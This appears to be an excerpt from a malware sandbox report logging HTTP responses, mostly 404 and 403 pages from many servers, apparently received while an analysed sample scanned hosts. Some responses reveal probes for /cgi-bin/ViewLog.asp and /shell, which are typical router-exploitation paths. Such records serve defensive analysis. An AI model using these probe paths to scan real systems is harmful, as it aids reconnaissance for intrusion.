Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 08:58:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:58:44 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 38 3a 35 38 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 08:58:44 GMTServer: Apache/2.
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 18 Mar 2024 08:58:44 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:58:44 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:58:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 18 Mar 2024 08:56:14 GMTContent-Length: 13761Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 0a 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdDate: Mon, 18 Mar 2024 08:58:42 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=1000Content-Type: text/htmlX-Frame-Options: sameoriginX-XSS-Protection: 1X-Content-Type-Options: nosniffContent-Security-Policy: default-src 'self'; frame-ancestors 'self'Content-length: 126Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: <HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD><BODY><H2>Access Error: 404 -- Not Found</H2></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 18 Mar 2024 08:58:48 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.25.3</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 08:58:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Connection: closeDate: Mon, 18 Mar 2024 08:58:48 GMTServer: lighttpd/1.4.54Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 08:58:44 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found Content-Length: 400Date: Mon, 18 Mar 2024 08:58:50 GMTKeep-Alive: timeout=5Connection: keep-aliveServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 55 52 4c 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 54 59 4c 45 53 48 45 45 54 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 77 61 72 6f 6f 74 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 55 52 4c 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 69 6d 67 20 73 72 63 3d 22 2f 77 61 72 6f 6f 74 2f 73 79 73 74 65 6d 5f 61 72 72 6f 77 2e 67 69 66 22 20 77 69 64 74 68 3d 22 32 31 22 20 68 65 69 67 68 74 3d 22 32 31 22 20 61 6c 74 3d 22 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 0a 09 3c 70 20 63 6c 61 73 73 3d 22 73 79 73 74 65 6d 5f 69 6e 66 6f 22 3e 0a 09 09 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 09 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>404 URL Not Found</title><link rel="STYLESHEET" type="text/css" href="/waroot/style.css"></head><body><h1>URL Not Found</h1><img src="/waroot/system_arrow.gif" width="21" height="21" alt="" border="0"><p class="system_info">The requested URL was not found on this server.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlContent-Length: 89Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlContent-Length: 89Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:58:52 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Keep-Alive: timeout=15, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:58:52 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:58:52 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-control:no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:58:53 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:58:52 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 18 Mar 2024 08:58:54 GMTserver: Apachevary: accept-language,accept-charsetupgrade: h2connection: Upgradeaccept-ranges: bytestransfer-encoding: chunkedcontent-type: text/html; charset=utf-8content-language: enData Raw: 33 43 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 